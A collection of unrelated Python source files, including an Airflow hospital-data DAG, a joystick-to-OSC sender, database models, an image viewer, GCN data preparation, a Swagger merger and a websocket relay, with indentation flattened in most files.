from hms_workflow_platform.core.services.query.payor_query_service import PayorQueryService
from hms_workflow_platform.core.services.template.encounter_template_service import EncounterTemplateService
from hms_workflow_platform.core.services.template.allergy_template_service import AllergyTemplateService
from hms_workflow_platform.core.services.template.appointment_template_service import AppointmentTemplateService
from hms_workflow_platform.core.services.template.billing_template_service import BillingTemplateService
from hms_workflow_platform.core.services.template.patient_template_service import PatientTemplateService
from hms_workflow_platform.core.services.template.payor_template_service import PayorTemplateService
from hms_workflow_platform.core.services.template.practitioner_template_service import PractitionerTemplateService
events = {
"encounter_create": [ None, EncounterQueryService, "fetchCreated" ],
"encounter_update": [ None, EncounterQueryService, "fetchUpdate" ],
"encounter_discharge": [ None, EncounterQueryService, "fetchDischarge" ],
"patient_create": [ None, PatientQueryService, "fetchCreated" ],
"patient_update": [ None, PatientQueryService, "fetchUpdate" ],
"patient_registration": [ None, PatientQueryService, "fetchRegistration" ],
"payor_create": [ None, PayorQueryService, "fetchCreated" ],
"payor_update": [ None, PayorQueryService, "fetchUpdate" ],
"practitioner_create": [ None, PractitionerQueryService, "fetchCreated" ],
"practitioner_update": [ None, PayorQueryService, "fetchUpdate" ],
"allergy_create": [ None, AllergyQueryService, "fetchCreated" ],
"appointment_create": [ None, AppointmentQueryService, "fetchCreated" ],
"billing_create": [ None, BillingQueryService, "fetchCreated" ],
"billing_inprogress_create": [ None, BillingQueryService, "fetchInprogressCreated" ]
}
domains = {
"patient": [ None, PatientTemplateService ],
"encounter": [ None, EncounterTemplateService ],
"payor": [ None, PayorTemplateService ],
"practitioner": [ None, PractitionerTemplateService ],
"allergy": [ None, AllergyTemplateService ],
"appointment": [ None, AppointmentTemplateService ],
"billing": [ None, BillingTemplateService ],
}
#Global parameter
project_name = settings.get("site", "")
default_args = {
'owner': 'HMS-Gateway',
# 'start_date': airflow.utils.dates.days_ago(0, hour=0, minute=0, second=0, microsecond=0),
# 'schedule_interval':"* * * * *",
# 'schedule_interval':None,
}
main_dag = DAG(
dag_id=project_name,
default_args=default_args,
start_date=timezone.utcnow().replace(
second=0,
microsecond=0),
schedule_interval=timedelta(seconds=30),
# schedule_interval=None,
concurrency=20,
)
def _generate_event(**kwargs):
event = kwargs['event']
date_str_yesterday = timezone.utcnow() - timedelta(hours=20)
service = events[event][1]()
service.prepareQuery(settings.get('data_source', ''), settings.get('site', ''))
try:
data_list = getattr(service, events[event][2])(yesterday=date_str_yesterday)
except AttributeError:
return []
return data_list
def generateEventTasks():
for event in events.keys():
operator = DummyOperator(
task_id=f'create_{event}_event',
dag=main_dag,
)
process_task = PythonOperator(
task_id=f'query_{event}',
python_callable=_generate_event,
op_kwargs={'event':event},
dag=main_dag,
)
operator >> process_task
events[event][0] = process_task
def _create_data_template(**kwargs):
task_instance = kwargs['task_instance']
ti = kwargs['ti']
domain = kwargs['domain']
service = domains[domain][1]()
print(f'service:{service}')
service.prepareTemplate(settings.get('data_source', ''))
for event in events.keys():
if domain == event.split('_')[0]:
data_list = ti.xcom_pull(task_ids=f'query_{event}')
# print(f'data_list::{data_list}')
keys = service.generateKey(data_list)
print(f'keys:{keys}')
task_instance.xcom_push(key=event, value=keys)
# return keys
def _handle_data_message_queue(**kwargs):
send_msg = SendToRabbit()
ti = kwargs['ti']
domain = kwargs['domain']
for event in events.keys():
if domain == event.split('_')[0]:
keys = ti.xcom_pull(task_ids=f'create_{domain}_template',key=event)
# print(data_list)
send_msg.send_to_rabbit(domain, keys)
def generateDomainTasks():
for domain in domains.keys():
task_create_key = PythonOperator(
task_id=f'create_{domain}_template',
python_callable=_create_data_template,
op_kwargs={'domain':domain, },
dag=main_dag,
)
handle_message_queue = PythonOperator(
task_id=f'handle_{domain}_message_queue',
python_callable=_handle_data_message_queue,
op_kwargs={'domain':domain},
dag=main_dag,
)
task_create_key >> handle_message_queue
domains[domain][0] = task_create_key
def mapDomainsToEvents():
for key in events.keys():
events[key][0] >> domains[key.split('_')[0]][0]
generateEventTasks()
generateDomainTasks()
mapDomainsToEvents()
|
#!/usr/bin/python
# change this to the IP address and port that will receive our OSC messages, if applicable
remoteIP = '10.0.0.111'
remotePort = 9000
import time, threading
import OSC # requires pyOSC from https://trac.v2.nl/wiki/pyOSC or https://gitorious.org/pyosc
import pygame
sendAddress = (remoteIP, remotePort)
client = OSC.OSCClient() # set up then connect to the OSC receiving server
client.connect(sendAddress)  # connect takes a single (host, port) tuple
def sendOSC(pin, state):
message = OSC.OSCMessage('/output/'+str(pin))
message.append(state)
    print(message)
client.send(message)
pygame.init()
joystickCount = pygame.joystick.get_count()
print (joystickCount, 'joystick(s)')
if joystickCount == 0:
print ('no joysticks attached')
else:
joystickInput = pygame.joystick.Joystick(0)
joystickInput.init()
try:
while 1:
for event in pygame.event.get():
if event.type == 10: # button down
#print event.button
pin = event.button + 1 # since the buttons start at 0
#print pin
sendOSC(pin, 1)
if event.type == 11: # button up
pin = event.button + 1
sendOSC(pin, 0)
#if event.type == 7: # axis move
#print event.axis
#print event.value
pygame.event.clear()
except KeyboardInterrupt:
    print('Done')
|
# This file allows us to define database models. Each model corresponds to a table in
# our relational database. If you've used web frameworks that utilize the
# Model-View-Controller (MVC) architecture, this is a part of the Model portion of that
# architecture, where we define the data structures in our database.
# Ref: https://fastapi.tiangolo.com/tutorial/sql-databases/#create-the-database-models
from sqlalchemy import Column, ForeignKey, Integer, String, Text
from sqlalchemy.orm import relationship
from app.database import Base
class User(Base):
__tablename__ = "users"
id = Column(Integer, primary_key=True, index=True)
email = Column(String, unique=True, index=True)
hashed_password = Column(String)
notes = relationship("Note", back_populates="author")
class Note(Base):
__tablename__ = "notes"
id = Column(Integer, primary_key=True, index=True)
title = Column(String, index=True)
note = Column(Text)
author_id = Column(Integer, ForeignKey("users.id"))
author = relationship("User", back_populates="notes")
|
# Generated by Django 2.2.9 on 2020-01-24 20:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contact', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ContactMessage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254)),
('message', models.TextField(max_length=2000)),
('date_sent', models.DateField(auto_now=True)),
('reply', models.TextField(blank=True, max_length=2000, null=True)),
('date_replied', models.DateField(blank=True, null=True)),
],
),
]
|
'''
Scivi is written/maintained/developed by:
S. Chris Colbert - sccolbert@gmail.com
Scivi is free software and is part of the scikits-image project.
Scivi is governed by the licenses of the scikits-image project.
Please report any bugs to the author.
The scivi module is not meant to be used directly.
Use skimage.io.imshow(img, fancy=True)'''
from textwrap import dedent
import numpy as np
import sys
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import (QApplication, QMainWindow, QImage, QPixmap,
QLabel, QWidget, QVBoxLayout, QSlider,
QPainter, QColor, QFrame, QLayoutItem)
from q_color_mixer import MixerPanel
from q_histogram import QuadHistogram
class ImageLabel(QLabel):
def __init__(self, parent, arr):
QLabel.__init__(self)
self.parent = parent
# we need to hold a reference to
# arr because QImage doesn't copy the data
# and the buffer must be alive as long
# as the image is alive.
self.arr = arr
# we also need to pass in the row-stride to
# the constructor, because we can't guarantee
# that every row of the numpy data is
# 4-byte aligned. Which Qt would require
        # if we didn't pass the stride.
self.img = QImage(arr.data, arr.shape[1], arr.shape[0],
arr.strides[0], QImage.Format_RGB888)
self.pm = QPixmap.fromImage(self.img)
self.setPixmap(self.pm)
self.setAlignment(QtCore.Qt.AlignTop)
self.setMinimumSize(100, 100)
self.setMouseTracking(True)
def mouseMoveEvent(self, evt):
self.parent.label_mouseMoveEvent(evt)
def resizeEvent(self, evt):
width = self.width()
pm = QPixmap.fromImage(self.img)
self.pm = pm.scaledToWidth(width)
self.setPixmap(self.pm)
def update_image(self):
width = self.width()
pm = QPixmap.fromImage(self.img)
pm = pm.scaledToWidth(width)
self.setPixmap(pm)
class RGBHSVDisplay(QFrame):
def __init__(self):
QFrame.__init__(self)
self.setFrameStyle(QtGui.QFrame.Box|QtGui.QFrame.Sunken)
self.posx_label = QLabel('X-pos:')
self.posx_value = QLabel()
self.posy_label = QLabel('Y-pos:')
self.posy_value = QLabel()
self.r_label = QLabel('R:')
self.r_value = QLabel()
self.g_label = QLabel('G:')
self.g_value = QLabel()
self.b_label = QLabel('B:')
self.b_value = QLabel()
self.h_label = QLabel('H:')
self.h_value = QLabel()
self.s_label = QLabel('S:')
self.s_value = QLabel()
self.v_label = QLabel('V:')
self.v_value = QLabel()
self.layout = QtGui.QGridLayout(self)
self.layout.addWidget(self.posx_label, 0, 0)
self.layout.addWidget(self.posx_value, 0, 1)
self.layout.addWidget(self.posy_label, 1, 0)
self.layout.addWidget(self.posy_value, 1, 1)
self.layout.addWidget(self.r_label, 0, 2)
self.layout.addWidget(self.r_value, 0, 3)
self.layout.addWidget(self.g_label, 1, 2)
self.layout.addWidget(self.g_value, 1, 3)
self.layout.addWidget(self.b_label, 2, 2)
self.layout.addWidget(self.b_value, 2, 3)
self.layout.addWidget(self.h_label, 0, 4)
self.layout.addWidget(self.h_value, 0, 5)
self.layout.addWidget(self.s_label, 1, 4)
self.layout.addWidget(self.s_value, 1, 5)
self.layout.addWidget(self.v_label, 2, 4)
self.layout.addWidget(self.v_value, 2, 5)
def update_vals(self, data):
xpos, ypos, r, g, b, h, s, v = data
self.posx_value.setText(str(xpos)[:5])
self.posy_value.setText(str(ypos)[:5])
self.r_value.setText(str(r)[:5])
self.g_value.setText(str(g)[:5])
self.b_value.setText(str(b)[:5])
self.h_value.setText(str(h)[:5])
self.s_value.setText(str(s)[:5])
self.v_value.setText(str(v)[:5])
class SciviImageWindow(QMainWindow):
def __init__(self, arr, mgr):
QMainWindow.__init__(self)
self.arr = arr
self.mgr = mgr
self.main_widget = QWidget()
self.layout = QtGui.QGridLayout(self.main_widget)
self.setCentralWidget(self.main_widget)
self.label = ImageLabel(self, arr)
self.label_container = QFrame()
self.label_container.setFrameShape(QtGui.QFrame.StyledPanel|QtGui.QFrame.Sunken)
self.label_container.setLineWidth(1)
self.label_container.layout = QtGui.QGridLayout(self.label_container)
self.label_container.layout.setMargin(0)
self.label_container.layout.addWidget(self.label, 0, 0)
self.layout.addWidget(self.label_container, 0, 0)
self.mgr.add_window(self)
self.main_widget.show()
self.setWindowTitle('Scivi - The skimage viewer.')
self.mixer_panel = MixerPanel(self.arr)
self.layout.addWidget(self.mixer_panel, 0, 2)
self.mixer_panel.show()
self.mixer_panel.set_callback(self.refresh_image)
self.rgbv_hist = QuadHistogram(self.arr)
self.layout.addWidget(self.rgbv_hist, 0, 1)
self.rgbv_hist.show()
self.rgb_hsv_disp = RGBHSVDisplay()
self.layout.addWidget(self.rgb_hsv_disp, 1, 0)
self.rgb_hsv_disp.show()
self.layout.setColumnStretch(0, 1)
self.layout.setRowStretch(0, 1)
self.save_file = QtGui.QPushButton('Save to File')
self.save_file.clicked.connect(self.save_to_file)
self.save_stack = QtGui.QPushButton('Save to Stack')
self.save_stack.clicked.connect(self.save_to_stack)
self.save_file.show()
self.save_stack.show()
self.layout.addWidget(self.save_stack, 1, 1)
self.layout.addWidget(self.save_file, 1, 2)
def closeEvent(self, event):
# Allow window to be destroyed by removing any
# references to it
self.mgr.remove_window(self)
def update_histograms(self):
self.rgbv_hist.update_hists(self.arr)
def refresh_image(self):
self.label.update_image()
self.update_histograms()
def scale_mouse_pos(self, x, y):
width = self.label.pm.width()
height = self.label.pm.height()
x_frac = 1. * x / width
y_frac = 1. * y / height
width = self.arr.shape[1]
height = self.arr.shape[0]
new_x = int(width * x_frac)
new_y = int(height * y_frac)
return(new_x, new_y)
def label_mouseMoveEvent(self, evt):
x = evt.x()
y = evt.y()
x, y = self.scale_mouse_pos(x, y)
# handle tracking out of array bounds
maxw = self.arr.shape[1]
maxh = self.arr.shape[0]
if x >= maxw or y >= maxh or x < 0 or y < 0:
r = g = b = h = s = v = ''
else:
r = self.arr[y,x,0]
g = self.arr[y,x,1]
b = self.arr[y,x,2]
h, s, v = self.mixer_panel.mixer.rgb_2_hsv_pixel(r, g, b)
self.rgb_hsv_disp.update_vals((x, y, r, g, b, h, s, v))
def save_to_stack(self):
from skimage import io
img = self.arr.copy()
io.push(img)
msg = dedent('''
The image has been pushed to the io stack.
Use io.pop() to retrieve the most recently
pushed image.''')
msglabel = QLabel(msg)
dialog = QtGui.QDialog()
ok = QtGui.QPushButton('OK', dialog)
ok.clicked.connect(dialog.accept)
ok.setDefault(True)
dialog.layout = QtGui.QGridLayout(dialog)
dialog.layout.addWidget(msglabel, 0, 0, 1, 3)
dialog.layout.addWidget(ok, 1, 1)
dialog.exec_()
def save_to_file(self):
from skimage import io
filename = str(QtGui.QFileDialog.getSaveFileName())
if len(filename) == 0:
return
io.imsave(filename, self.arr)
|
from graphmix import Graph
import numpy as np
import scipy.sparse as sp
import os
import sys
import math
import argparse
import pickle as pkl
import networkx as nx
'''
Usage example: (in Dir Hetu/)
python ./tests/test_DistGCN/prepare_data_GCN15d.py --size 8 --replication 2 --dataset Reddit
'''
def coo_slice(a, row_range, col_range):
a = a.tocoo()
condition = np.where((a.row >= row_range[0]) & (a.row < row_range[1]) & (
a.col >= col_range[0]) & (a.col < col_range[1]))
return sp.coo_matrix((a.data[condition], (a.row[condition]-row_range[0], a.col[condition]-col_range[0])), shape=(row_range[1]-row_range[0], col_range[1]-col_range[0]))
def get_adj_matrix_all(A, replication, size, dir_name):
node_count = A.shape[0]
n_per_proc = math.ceil(float(node_count) / (size // replication))
stages = size // (replication ** 2)
col_block = stages*n_per_proc
row_block = math.ceil(float(node_count)/(size//replication))
for rank in range(size):
rank_row = rank // replication # i
rank_col = rank % replication # j
col_start = int(col_block*rank_col)
col_end = int(col_block*(rank_col+1))
if col_end > node_count:
col_end = node_count
row_start = int(row_block*rank_row)
row_end = int(row_block*(rank_row+1))
if row_end > node_count:
row_end = node_count
a = coo_slice(A.tocoo(), row_range=(row_start, row_end),
col_range=(col_start, col_end))
sp.save_npz(dir_name+"adj_part"+str(rank)+".npz", a)
print("adj_part: rank = %d" % rank, a.shape, len(a.data))
def get_inputs(H, replication, rank, size):
node_count = H.shape[0]
rank_row = rank // replication # i
row_block = math.ceil(float(node_count)/(size//replication))
row_start = int(row_block*rank_row)
row_end = int(row_block*(rank_row+1))
if row_end > node_count:
row_end = node_count
h = H[row_start:row_end, :]
print("inputs_part: rank = %d" % rank, h.shape)
return h
def parse_index_file(filename):
index = []
for line in open(filename):
index.append(int(line.strip()))
return index
def normalize(mx):
"""Row-normalize sparse matrix"""
rowsum = np.array(mx.sum(1))
r_inv = np.power(rowsum, -1).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
mx = r_mat_inv.dot(mx)
return mx
def check_sparsity(adj):
if args.size == -1:
return
adj = adj.tocoo()
node_count = adj.shape[0]
block_num = args.size//args.replication
p = math.ceil(float(node_count)/(args.size//args.replication))
starts = list(range(0, node_count, p))
ends = list(range(p, node_count, p))+[node_count]
sparsity = np.zeros(shape=(block_num, block_num), dtype=int)
for i in range(block_num):
for j in range(block_num):
sparsity[i, j] = np.where((adj.row >= starts[i]) & (adj.row < ends[i]) & (
adj.col >= starts[j]) & (adj.col < ends[j]))[0].shape[0]
print(sparsity)
def load_data(args):
dataset = args.dataset
data_dir = './tests/test_DistGCN/datasets/%s/' % dataset
# ---load data---
if dataset == "Reddit":
adj = sp.load_npz(data_dir+'raw/reddit_graph.npz')
inputs = np.load(data_dir+'raw/reddit_data.npz')
x, y = inputs['feature'], inputs['label']
elif dataset == 'Proteins':
adj = sp.load_npz(data_dir+'protein_adj.npz')
y = np.load(data_dir+'protein_labels.npy')
y = y.astype(int)
np.random.seed(123)
bounds = np.sqrt(6.0 / (132534 + 602))
x = np.random.uniform(low=-bounds, high=bounds,
size=[132534, 602]).astype(np.float32)
elif dataset == 'Arch':
adj = sp.load_npz(data_dir+'arch_adj.npz')
y = np.random.randint(10, size=adj.shape[0])
np.random.seed(123)
bounds = np.sqrt(6.0 / (adj.shape[0] + 602))
x = np.random.uniform(low=-bounds, high=bounds,
size=[adj.shape[0], 602]).astype(np.float32)
elif dataset == 'Products':
adj = sp.load_npz(data_dir+'products_adj.npz')
x = np.load(data_dir+'products_feat.npy')
        y = np.load(data_dir+'products_label.npy').astype(int)  # np.int was removed in NumPy 1.24; use the builtin int
elif dataset == 'Youtube':
adj = np.load(data_dir+'youtube_coo.npy', allow_pickle=True).item()
np.random.seed(123)
bounds = np.sqrt(6.0 / (adj.shape[0] + 602))
x = np.random.uniform(low=-bounds, high=bounds,
size=[adj.shape[0], 602]).astype(np.float32)
y = np.load(data_dir+'youtube_label.npy')
graph = Graph(edge_index=np.vstack(
[adj.row, adj.col]), num_nodes=x.shape[0])
# ---preprocess graph---
graph.add_self_loop()
normed_val = graph.gcn_norm(True)
node_count = graph.num_nodes
# ---construct adj,x,y---
edge_index = graph.edge_index
adj = sp.coo_matrix(
(normed_val, (edge_index[0], edge_index[1])), shape=(node_count, node_count))
# ---check block sparsity---
print('Sparsity before reordering:')
check_sparsity(adj)
if args.shuffle == 1:
print("Shuffle the graph...")
order = np.random.permutation(node_count)
adj = adj.tocsr()[:, order][order]
x = x[order, :]
y = y[order]
print('Sparsity after Shuffle:')
check_sparsity(adj)
print('node_count = %d, num_features = %d, num_classes = %d, edge_count = %d' % (
adj.shape[0], x.shape[1], np.max(y)+1, len(adj.data)))
return adj, x, y
def prepare_data(args, prepare_all_data=False):
dataset, replication, size = args.dataset, args.replication, args.size
print("Preparing data...")
adj_all, input_all, label_all = load_data(args)
if prepare_all_data:
size_set = [1, 2, 4, 8, 4, 8]
replication_set = [1, 1, 1, 1, 2, 2]
else:
size_set = [size]
replication_set = [replication]
for i in range(len(size_set)):
replication, size = replication_set[i], size_set[i]
print("size=%d, replication=%s, dataset=%s" %
(size, replication, dataset))
if size == 1: # whole graph for single GPU
replication = 1
dir_name = "./tests/test_DistGCN/data_GCN15d/%s_whole_graph/" % dataset
if not os.path.exists(dir_name):
os.makedirs(dir_name)
adj_all = adj_all.tocoo()
sp.save_npz(dir_name+"adj_whole.npz", adj_all)
print("adj_whole: ", adj_all.shape, len(adj_all.data))
np.save(dir_name+"input_whole.npy", input_all)
print("inputs_all: ", input_all.shape)
np.save(dir_name+"label_whole.npy", label_all)
print("labels_all: ", label_all.shape)
print("Data preparation done!")
else: # partitioned graph for multiple GPU
dir_name = "./tests/test_DistGCN/data_GCN15d/%s_size_%d_rep_%d/" % (
dataset, size, replication)
if not os.path.exists(dir_name):
os.makedirs(dir_name)
for rank in range(size):
input_part = get_inputs(input_all, replication, rank, size)
label_part = get_inputs(
label_all.reshape(-1, 1), replication, rank, size).reshape(-1)
np.save(dir_name+"input"+str(rank)+".npy", input_part)
np.save(dir_name+"label"+str(rank)+".npy", label_part)
print("Done inputs and labels!")
get_adj_matrix_all(adj_all, replication, size, dir_name)
print("Data preparation done!")
def get_dataset(args):
if args.dataset in ['Reddit', 'reddit']:
args.dataset = 'Reddit'
elif args.dataset in ['Proteins', 'proteins']:
args.dataset = 'Proteins'
elif args.dataset in ['Arch', 'arch']:
args.dataset = 'Arch'
elif args.dataset in ['Products', 'products']:
args.dataset = 'Products'
elif args.dataset in ['All', 'all']:
args.dataset = 'All'
    else:
        raise ValueError(
            "Dataset should be in ['Reddit','Proteins','Arch','Products','All']")
parser = argparse.ArgumentParser()
parser.add_argument('--replication', type=int, default=1,
help='Replication of distGCN1.5D.')
parser.add_argument('--size', type=int, default=8,
help='Number of devices')
parser.add_argument('--dataset', type=str, default="Reddit",
help='Choose dataset [Reddit, Proteins, Arch, Products].')
parser.add_argument('--shuffle', type=int, default=1,
help='Whether to shuffle the graph before algorithm.')
args = parser.parse_args()
get_dataset(args)
if args.size == -1:
prepare_data(args, True)
elif args.dataset == 'All':
dataset = ['Reddit', 'Proteins', 'Arch', 'Products']
for i in range(len(dataset)):
args.dataset = dataset[i]
prepare_data(args)
else:
prepare_data(args)
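# Example invocations (the script name is hypothetical and shown only for illustration):
#   python prepare_data.py --dataset Reddit --size 8 --replication 2
#   python prepare_data.py --dataset All --size 4 --replication 1
#   python prepare_data.py --size -1    # prepare every (size, replication) combination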
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Combine and serve Swagger specifications."""
import os
import json
import requests
from werkzeug.wrappers import Request, Response
SERVICES = [
    service.strip()
    for service in os.environ.get('SERVICES', '').split(',')
    if service.strip()
]
WSGI_NUM_PROXIES = int(os.environ.get('WSGI_NUM_PROXIES', 0))
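# Configuration sketch (illustrative values; the service names are hypothetical):
#   SERVICES="storage,deployer"        -> fetch <API_ROOT_URL>/storage/swagger.json, ...
#   API_ROOT_URL="https://example.org/api"
#   WSGI_NUM_PROXIES=1                 -> wrap the app in werkzeug's ProxyFix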
def merge(*specs):
"""Merge paths and definitions from given specifications."""
composed = {
'definitions': {},
'paths': {},
'schemes': [],
'securityDefinitions': {},
'tags': [],
}
for definition in specs:
# combine only v2 schemas
composed.setdefault('swagger', definition['swagger'])
assert composed['swagger'] == definition['swagger']
# extend tags
composed['tags'].extend(definition.get('tags', []))
# schemes
composed['schemes'] = list(
set(composed['schemes'] + definition.get('schemes', [])))
# combines paths
for key, path in definition['paths'].items():
# FIXME temporary workaround for trailing slashes
if key.endswith('/'):
key = key.rstrip('/')
composed['paths'][definition['basePath'] + key] = path
# combines definitions
for key, defs in definition.get('definitions', {}).items():
assert key not in composed['definitions']
composed['definitions'][key] = defs
for key, defs in definition.get('securityDefinitions', {}).items():
if key in composed['securityDefinitions']:
security_defs = composed['securityDefinitions'][key]
same_keys = ('authorizationUrl', 'type', 'flow')
for check_key in same_keys:
assert security_defs[check_key] == defs[
check_key], check_key
composed['securityDefinitions'][key]['scopes'].update(
**defs['scopes'])
else:
composed['securityDefinitions'][key] = defs
return composed
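# Minimal usage sketch (hypothetical toy specs, not the deployed services):
#   merge({'swagger': '2.0', 'basePath': '/svc-a', 'paths': {'/jobs/': {}}},
#         {'swagger': '2.0', 'basePath': '/svc-b', 'paths': {'/users': {}}})
# yields a spec whose paths are '/svc-a/jobs' and '/svc-b/users': each path is
# prefixed with its service's basePath and trailing slashes are stripped.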
def swagger(endpoint, *services):
"""Return merged specification."""
specs = (requests.get(service).json() for service in services)
spec = merge(*specs)
spec['host'] = endpoint
# TODO add title and other spec details
return spec
def application(environ, start_response):
"""Simple swagger serving app."""
request = Request(environ)
api_root_url = os.environ.get('API_ROOT_URL', request.host_url).rstrip('/')
services = [
'/'.join((api_root_url, service, 'swagger.json'))
for service in SERVICES
]
text = json.dumps(swagger(request.host, *services))
response = Response(text, mimetype='application/json')
return response(environ, start_response)
if WSGI_NUM_PROXIES:
from werkzeug.contrib.fixers import ProxyFix
application = ProxyFix(application, num_proxies=WSGI_NUM_PROXIES)
if __name__ == '__main__':
api_root_url = os.environ.get('API_ROOT_URL', 'http://localhost/api').rstrip('/')
services = [
'/'.join((api_root_url, service, 'swagger.json'))
for service in SERVICES
]
print(json.dumps(swagger(api_root_url, *services)))
|
import tornado.websocket
import json
import datetime
from system.log import log
from system.webserver import Webserver
from game.player import Player
class WebsocketRTC(tornado.websocket.WebSocketHandler):
websocket_send_data = []
websocket_clients = []
    @staticmethod
    def websocket_send(client, data, binary=False):
        WebsocketRTC.websocket_send_data.append([client, data, binary])
        Webserver.main_loop.add_callback(WebsocketRTC.send_to_socket)
    @staticmethod
    def send_to_socket():
        client, data, binary = WebsocketRTC.websocket_send_data.pop(0)
        if len(WebsocketRTC.websocket_clients) > 0:
            if client is True:
                for c in WebsocketRTC.websocket_clients:
                    c.write_message(data, binary)
            else:
                client.write_message(data, binary)
        else:
            log.warn("Webserver: send_to_socket: message dropped: no clients!")
def write_all_but_me(self,message):
for c in WebsocketRTC.websocket_clients:
if c is not self:
c.write_message(message)
def open(self):
log.debug("WebSocketRTC opened")
WebsocketRTC.websocket_clients.append(self)
#ans = {
# "cmd": "version"
# }
        #self.write_message(json.dumps(ans)) # ok here!
#Websocket.websocket_send(self,json.dumps(ans),False)
def on_message(self, message):
# process json messages
jsonmsg = json.loads(message)
log.debug("Websocket: received message: "+str(jsonmsg))
self.write_all_but_me(message)
#if jsonmsg['cmd']=='ping':
# ans = {
# "cmd": "pong",
# }
# self.write_message(json.dumps(ans))
#elif jsonmsg['cmd']=='user':
# self.player.parse_user_command(jsonmsg['data'])
def on_close(self):
log.debug("WebSocketRTC closed")
WebsocketRTC.websocket_clients.remove(self)
|